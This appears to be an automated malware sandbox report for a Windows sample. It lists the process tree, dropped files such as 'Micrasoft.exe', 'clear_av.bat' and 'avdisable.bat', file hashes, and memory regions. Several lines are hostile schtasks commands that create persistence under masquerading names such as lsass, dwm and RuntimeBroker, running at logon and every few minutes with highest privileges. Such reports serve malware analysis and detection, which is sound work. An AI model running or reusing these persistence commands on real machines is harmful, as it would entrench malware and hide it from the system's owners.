"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gyyX5OxKdc.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IxigaWiN4Z.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ATZuYpZxcK.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3B2OAH3dio.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TK13bru719.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\n9GQh003RW.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Mail\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Mail\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Windows\Panther\actionqueue\Registry.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Windows\Panther\actionqueue\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Windows\Panther\actionqueue\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Default User\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\dwm.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CqaKHWd6Ky.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QLJ4q7S46F.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\dwm.exe

"C:\Users\Default User\dwm.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tlxpltA24S.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CL2HVdYORd.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\dwm.exe

"C:\Users\Default User\dwm.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ph6jqiBtuj.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yyRUJOSyqo.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\dwm.exe

"C:\Users\Default User\dwm.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2sHl3bGdB9.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\U04fYIssV3.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\dwm.exe

"C:\Users\Default User\dwm.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\95TPLp0dsP.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TiDn8Em9ri.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\dwm.exe

"C:\Users\Default User\dwm.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uLZJId2lFR.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\a1lJXnITmE.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\dwm.exe

"C:\Users\Default User\dwm.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\g1eT93LUFj.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\J6RTVEKunr.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\dwm.exe

"C:\Users\Default User\dwm.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kUVpzpaF2i.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

Network

Files

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

C:\Users\Admin\AppData\Local\Temp\FunChecker .bat

C:\Users\Admin\AppData\Local\Temp\clear_av.bat

C:\Users\Admin\AppData\Local\Temp\avdisable.bat

MD5 4c35b71d2d89c8e8eb773854085c56ea
SHA1 ede16731e61348432c85ef13df4beb2be8096d9b
SHA256 3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42
SHA512 a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe

MD5 9a1c593488c39a17105a4ea268b40a0e
SHA1 90f73ef3dd6c79442f27f481957e60f0deaa3ab4
SHA256 9158f324d6e13bef490aa65d1a88faf7a86ea8f5672a169a1bebcbe6b84bf7b5
SHA512 a955caffe8bd4b697afadaf18f7bb34fe17c1fc7555708a0bff792c301c9b40ebdc680b0e8c50219ea37b23cf3b154f041ec57c549979d3b8f9546b269cdd67d

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat

MD5 773bdbbe3e641a349d737adddf1223c0
SHA1 682e313b914460eefe3e2cb7a09beeacd461c108
SHA256 606a9b2fe5108baa4a87284abaa58179f02cb4df332e81bf866351b66a04643a
SHA512 0f2a2ac17804b254d91dee3ebba42df3630ffef674ec72102310ed76c9adaa874abb02d7a674183838da8951428a2d8504f6717279fd725be6002565017154a4

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

MD5 1876c5d2f6209c7ca5db2b568ec8dc47
SHA1 6bc2ed6ef3bfff6ac95ddeba230634520ea4fe33
SHA256 e580bbab6157f88c10d75fdbf17ac4d971e60d6e81982da6e78dfb28af58a755
SHA512 b2f2a38154cbf531ab5e47c6e310ca2de4a5365055115af2ee5e08a3d2ac1c21db6b964f0b36c69ffe0164b7dafb2552a9bc6ac6a2846247f58564c9a834cf94

memory/4244-37-0x0000000000DE0000-0x0000000001004000-memory.dmp

memory/4244-38-0x0000000003230000-0x000000000324C000-memory.dmp

memory/4244-41-0x000000001C290000-0x000000001C2E6000-memory.dmp

memory/4244-40-0x000000001BC40000-0x000000001BC56000-memory.dmp

memory/4244-39-0x000000001C2E0000-0x000000001C330000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eTV455KIx4.bat

MD5 1b4a19e515e0c71312550338819dd017
SHA1 e0fb40a2f66a0ce149d9601c35b9a98340da5558
SHA256 34f1d0dc10332cdd184ee6478dcf2f1aab405cc28da8381b21cde9e92b0591e8
SHA512 4589f9918b6905a6cb304aa8afd461969be3c931434e5dcd2d1b5cff961793783c86685177d42645c32ef99fafaf841fc2cf56eea68a0173e8a2463d660b366f

memory/4380-57-0x000000001C260000-0x000000001C2B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Zlmto9DLwM.bat

MD5 1dd5257e9ff959f9064c605fdb997281
SHA1 d7f7033aea353c677bf570693b22eaa4f2488a2a
SHA256 21def03862c9d210a2e8bc1fd45f5ca48ec0f694b8b04000ec2b834354d9b344
SHA512 421b76964320c850baef10fbeef519bba0e670954889968aa745c7505d4e49d8e7dc78511f6fe98907bdf1a7d053810d53792cb2ba97ac3e7936685112525b51

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SppExtComObj.exe.log

MD5 3ad9a5252966a3ab5b1b3222424717be
SHA1 5397522c86c74ddbfb2585b9613c794f4b4c3410
SHA256 27525f5fc7871c6828ab5173315e95b5c7e918d2ee532781c562c378584b5249
SHA512 b1a745f7a0f33b777ffc34f74f42752144d9f2d06b8bc613e703570494762b3af87e153212c3274b18af14f17b8619e2f350b7c3cc11228f7d4208d4251e90e6

C:\Users\Admin\AppData\Local\Temp\NfeiSKMyn5.bat

MD5 ddf2d11fd25757953bc597227ff4581b
SHA1 11ed5245f8689701a9c525f7f0effcbf6a3a626a
SHA256 ec604011deb01052777763c05b8d734efc0d204b9cdafd8ed5087fecb593c492
SHA512 38ce8264f0e34ad77080b4955c40a7ce7868ee0544c2ec192142c8b63fe70a875034541462141be2694be61bec425c54ee442310850b651539586e34fb43ee8f

C:\Users\Admin\AppData\Local\Temp\Pbgl9PPr7s.bat

MD5 6b06086a6ead6c6505271c7eff535fa8
SHA1 24a6fe0516c6667c7e894c2ca85248c80773c5fd
SHA256 242eb5be086ab780228861b931a06cd4c66baaaa3ef50d05c428f69a8c5e4e8e
SHA512 0bbc1f905139ea39fe38c03f60b9a7f3d9aab51435e4d5105e6f4cc9734453f1046a7a665f10fb49ce63ffce5a3c462e13d8b06fbfc3de060b62e431f681e67d

C:\Users\Admin\AppData\Local\Temp\nfin2KLgOh.bat

MD5 d8e9fe44acfb6e4ac16d99a4bd5e6285
SHA1 53c32f960d544f50c7fc0969fe5f9fe4a6321afe
SHA256 01d0e3db5c2ae9e5c5c4b667407f3cb1464bcdef1dee93f75bc5619861a405ad
SHA512 ddc04a3b2348a2e365b8457939e64f543b425b9d99fcd9409d7eee2b275258fd2a1b922c11741d3fb8904bc3cfb6726d65e2c5e1d0a47d4fd4289bb4c811d379

C:\Users\Admin\AppData\Local\Temp\QwDZd8tkMK.bat

MD5 89477942f9a507d7a9fdb2053220fd67
SHA1 503a33d81cf10a8bd5736f4b645ffd20be5c114e
SHA256 8bf67a6eba80f3a7f817651c0bc6d25bb12bbb1681ad4e7316f42912bff15bfc
SHA512 41e784ce7596bc418f45ee278f28fcbdf9b0bccf525f643fff808604830a4c1d679917875410064c4ad0a6e51319b9c4e6e2b9e3022a7a2f92fc822961f43352

memory/1228-90-0x000000001B4A0000-0x000000001B4F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CL2HVdYORd.bat

MD5 3c5b866d7ca5b59d0f94ebf999c55500
SHA1 e7d0cf9c88f3ca21511b5c506017c16cb710a82c
SHA256 0a186e99c835e017febaa9d96468d4e583e0b87a8dd08ba31cac74d2939b67d0
SHA512 c89e2d4c700da08db62ba85c8d566ba3c0f1a431eabe89f8d77aa9c0874dd661e71b27f259ec17d1f13eaa0bd46219296519b760b8637df829c7994b9023fd6e

C:\Users\Admin\AppData\Local\Temp\Mw1PlbJmoj.bat

MD5 93e21e9643a646450c67771926161512
SHA1 08261c3069e77ce8c5b457c77548255b05c7e5a5
SHA256 c5afc6435e3890db3c23e01e610b2e7698817eb9e7f9355ba0aed47124b7c825
SHA512 495d6c850101ff3b3e16435631e216f79e679898bc3b951423813fd7c7d96de348a5db34069090585c04311f73d63cb274a570938aff7b76a14b2ee08ce69246

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a499254d6b5d91f97eb7a86e5f8ca573
SHA1 03dbfebfec8c94a9c06f9b0cd81ebe0a2b8be3d1
SHA256 fb87b758c2b98989df851380293ff6786cb9a5cf2b3a384cec70d9f3eb064499
SHA512 d7adcc76d0470bcd68d7644de3c8d2b6d61df8485979a4752ceea3df4d85bd1c290f72b3d8d5c8d639d5a10afa48d80e457f76b44dd8107ac97eb80fd98c7b0c

\??\pipe\LOCAL\crashpad_512_HKFOZLXYYLPYZBQO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bafce9e4c53a0cb85310891b6b21791b
SHA1 5d70027cc137a7cbb38f5801b15fd97b05e89ee2
SHA256 71fb546b5d2210a56e90b448ee10120cd92c518c8f79fb960f01b918f89f2b00
SHA512 c0e4d3eccc0135ac92051539a18f64b8b8628cfe74e5b019d4f8e1dcbb51a9b49c486a1523885fe6be53da7118c013852e753c26a5490538c1e721fd0188836c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 203e7bb6e4ef7b8bc6250f5ac0844894
SHA1 aa4438d4f8fdce96bda9961c474ab0e8a7e81b03
SHA256 9db6b1601bd08b58a350de8f6bc9d529f7da5572991483c809019cccc7809b52
SHA512 7677d2af29604ee33e69dbd955f223434ca5e2ab892c575bb6fca8b3c076010f88260194ea4f90efc28d4445b2437381cace2a3a321810e45fe7a203cb539f51

C:\Users\Admin\AppData\Local\Temp\gZmmY05In2.bat

MD5 295baaeb275595233c5559cce2a3592e
SHA1 cb8862392efa3273c350dfb63fcf1b4411e48641
SHA256 5bc3486ce8a8b4ae4b6986ae5790386e53cae48e02f7fbb4a7f87c360783b7f2
SHA512 35e89067cf1b3b22249cb341c2d4fc30c9de3ea3576c6f3c827feb3b555b4fcf27302104a0d018463c8c9175afb46d2a6d8b66a91d4d7df129577e3ef8c3d1ac

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Temp\nAABNdhKLs.bat

MD5 b31a21dccab679ece761bc0a4aba4d15
SHA1 aea1d17f8ef8f10c2c091676a85df83b583de6a2
SHA256 5b57640661d1893837484dd20f3e6e6318ec8ba67ed10a83a1f55049d6b26220
SHA512 114d204d126fad6fca8106b389b6dcf9718e6ae5946951dd872636f85363896b95ae72917c78f15f17ac6d83cfccdba84d22836969facf37c35826385080ff48

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 13d4ddbed0c9e7909651b8d124e11f48
SHA1 d2b4cdfcd845565ba0eed8913d81085575699819
SHA256 7df9a8bb4c5fce0987993867ef6c9cd652609b63529d5141317025bd66e327b8
SHA512 c5e8808262fde54e85bd00275f29c614cbbc71970f22480a5a51ffc171da64c9453dd0bb3eeb17c71c2f9d41f531248eff6214cc925c510331ec052c6221d4ab

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 45d0eb41f28e12d8dde26ffc9cb8eaa2
SHA1 861b553b676bb4c9651d6f2cf66a6d56db54d5b3
SHA256 1050b92f981eddf2a90d18e3ff31fd4fbd2c461f0245b5e477563328fc48ba0f
SHA512 558a401efd9b5b038a4cdb2a821472fdcc39a8b2e5e2a3d3586a20526b92f32433fa90a3378f434c62e0d659559de67cbbfd904855708b4fae157d5bc5aae269

C:\Users\Admin\AppData\Local\Temp\vF7CrwxjwX.bat

MD5 3cb432197f9023d40588f8e45763554c
SHA1 a27ad5a9a04af16bbdb56b56dfcfd09590a7a2fe
SHA256 f3d4e00d8899980d852ba33e1f0d1ef93e3688158840bcfa3ebe387b0d840707
SHA512 f50298af20e5cce8ad004a23d9fe37809f0c5c80598a51120bb4aaf3b3e38beee5793807e79dedd4e82dcfe78d633263d3b5bd8dd842f5ade31fcf0d8580838b

C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat

MD5 2c19e007a35a1554ccb2374eb98d71f8
SHA1 2662ad00d9f59929509edf28504f713e01f49605
SHA256 00c182eead9d6caba638d3ccc937d617f1fdd95d87407c448a2d4f7e934542be
SHA512 3668e589f2d654af114939e2d0b53009da3c7524829d95438a890b86719b3b86e3c40f7b9d011c195812dd3801925844e769db2fa505cb575654fb986169d0c7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 cad6e89c5563c9919bfb1a651775b47d
SHA1 4396f99ccb9b153f2a88d073250220ee801bcfb9
SHA256 6cece870326216dc7bbb089cefffa4fa40b8a086d3b05cc73f56f114d4ba2923
SHA512 1ca1d0bc94edb3211eb7bfd166f19b2dac9901b6cbc46758892636df68e6c532fec664e03b4e1372d9f13ab66ed1e7790553c874a8724224984b8f62aad226c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001b

MD5 151fb811968eaf8efb840908b89dc9d4
SHA1 7ec811009fd9b0e6d92d12d78b002275f2f1bee1
SHA256 043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed
SHA512 83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

C:\Users\Admin\AppData\Local\Temp\bhowVEGEG8.bat

MD5 9c1919b6d662f90def2712cbaeb6d2d2
SHA1 7e0bcfc8a92dee6d57d848ae670c73a6b4f6378c
SHA256 0d8c13d21705508c80657aaaf1b25df7ccecefd3d08ea78cc9118e330bc57474
SHA512 b8771dd85b58001186b33ef8b0663ba07af5cb333c0af705b8163d8ed015328823a9a4b0a179b8cd53becf6562074f35f459bd6e157301777761fea1e9532c15

C:\Users\Admin\AppData\Local\Temp\LZh5ueQJla.bat

MD5 19e9d8f4ffb028c23e94ba66cbff56df
SHA1 3c2462fe2c298f0addf847d1309e88f4d3491e39
SHA256 e42d2f8e4fb43a29527562dc351f2b0a36111c583fd6f3f2f150312914079e0e
SHA512 747bf743e8f71c2e914e5381e71e3043d11182488cd0e1b59e2670be0c70a35b89e554590fe28a6a4ed26c179b2820db7a0131c3c707ba23dc158ec7a4a7fe8d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d3543ad16260cc53f0a1b0ae352e5a89
SHA1 6d207544aa7ca1c6b7108aa513f763bc118d3324
SHA256 097eae486e55a1bcd0cb8b81dda21969ea84fb41baaf564a0836ec0617b424ef
SHA512 4130a23128a257d344a4633b611023c4dff83b9ce830f6274b66472b17d5eed60cb5db5bfbe136116d70b11f52cc24f1306747e682af3b290628f1729678d89c

memory/5528-467-0x000000001B2F0000-0x000000001B346000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eR3ydISl4k.bat

MD5 a89debc011eb2c0cc1fd1982582035aa
SHA1 a9b77041c66609ae1f37ec00ead14a9e777d79d9
SHA256 424af37b61a131cbd091cf5d36d43eb6c47a390b0887abb466882b0d980568bd
SHA512 f22a6f011d3c5ccdc8afb8be3b63f8a2fe278e258102aca45c5f253b24d76e2bf69dcf95704898f63855776b2d6eb0d82b12586411de31d4066d330c28cb66d7

memory/6092-478-0x000000001B8E0000-0x000000001BA4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iqKdioc4MG.bat

MD5 3f1da1b3a3a4507891cfa1ca53643a28
SHA1 ff7aaa36cb95660009bc3e79fd81b9c0570ee23d
SHA256 e710d4b9b2c6b1debf4362bdc3c476a6301749cd964592be836ad22c7a353b45
SHA512 3157c96e73b1f7a38d9308419703028559a410a438a3d71cd805035aed2fe35df370eef660fbf18a2aeedf75f70046eb948ea9c683014783f38ac9d1c4de79ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe592abf.TMP

MD5 a6b5ed40d626971f6cb2213f56eb0383
SHA1 9f1e012e928a64eee0ba5f5823ca3e16af123a13
SHA256 2c09731395923fa810b8c7861add7fa9e8b92d1fe10b0a45ce60ebf3787bdb85
SHA512 cd0a5f5728fa58673be0b9753a398746189f4cd004ca871f4f8e0e772d5037565496e076528466e08b39bec06077da0e6d5ed602f86af9b919b00009fe795733

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 641b675baf8f3cd8b302fd961f5855ea
SHA1 b15ef9afcb3415d7941933952342080e0940c760
SHA256 d011f036b57dbd2f0ffec8e1a15700dab2d7e816d7c5a9ab67a52adef08549ee
SHA512 9617d083db476737fabd631463cfa21ada1c3ccf68c948dd564badb05f77ae845d2f54976d4f7aa089e0290ce627f619e6f4fe478d1a32a4aa2a722b846bfe07

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 254aad64f168b660c297a702006ddb81
SHA1 0bf3a56d8f0e86b8db8ed8c619791437ff0148c1
SHA256 b91d35ef86a6715aeaf6ebb8d8a416392c975fba8f4f0f3dcbfb6bfc8d56f587
SHA512 67188d53f22f7a739f9c06c4ecfc46aeb8d9b8adfd58605561c557074e60793f2ae3a847372b655969550a4b67afd411189855210ed711ad0ca78e3f124bf241

C:\Users\Admin\AppData\Local\Temp\8RIE4o2SCx.bat

MD5 96bdbc6a3ffe2bc5fab8f65e1f6fcdd0
SHA1 e27159bea0d2fc97cd050cdfff0dabda6a56855b
SHA256 18f1bb33db63a9f3d19a65308472c854a510dbe124e47150f0ab9f7cd52dd3e0
SHA512 27ad38090a549b211a2c187674fccad38e7f847d0e1224980c46994a35ead1968b71ad18d273be8ad21645806aa24d0148f58ee5481435cc22a761fd62ec66c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 b704a36d360f3c4360b001cd9ad23641
SHA1 23ed8b2c57efc493e4f7346d526a9204eee6d4be
SHA256 52d35277329aa003c7f4b743a7adcb4859c7899e84b831a8f79c40186fa8f474
SHA512 73fde9aceb52815912f3b12e32f676e35cd47280ba30b9bb7b855e1148e164ce3baf824b74d05d6249585b4a7b2a997e47aef00880f267f07d5c2b3849a31607

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3ed9fe2c956a6df7c44116956aa50979
SHA1 c213aeaacfe73bd68ecc2ed0b51359cb1e0cb167
SHA256 91d95906553dbe330ef171dde68ce28c03e2eb5b5096d3214d5d5cfe0f9b143b
SHA512 aa4d8a8a5f7a55250ee15bea37a255209822a5e978c6d6da605f367ac381baab4803303ae0ff94167c8e2401302a56e2b12a21b12e7404fa4129677853bfb308

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 cad3b20f792125d8556dead8c6f713f8
SHA1 c62399ca588673a0decb60ac57bf85bba09ae923
SHA256 627f9c8d3bd362b8ba18549aec206c9a491efde813bad98c0459fefa411bc6c2
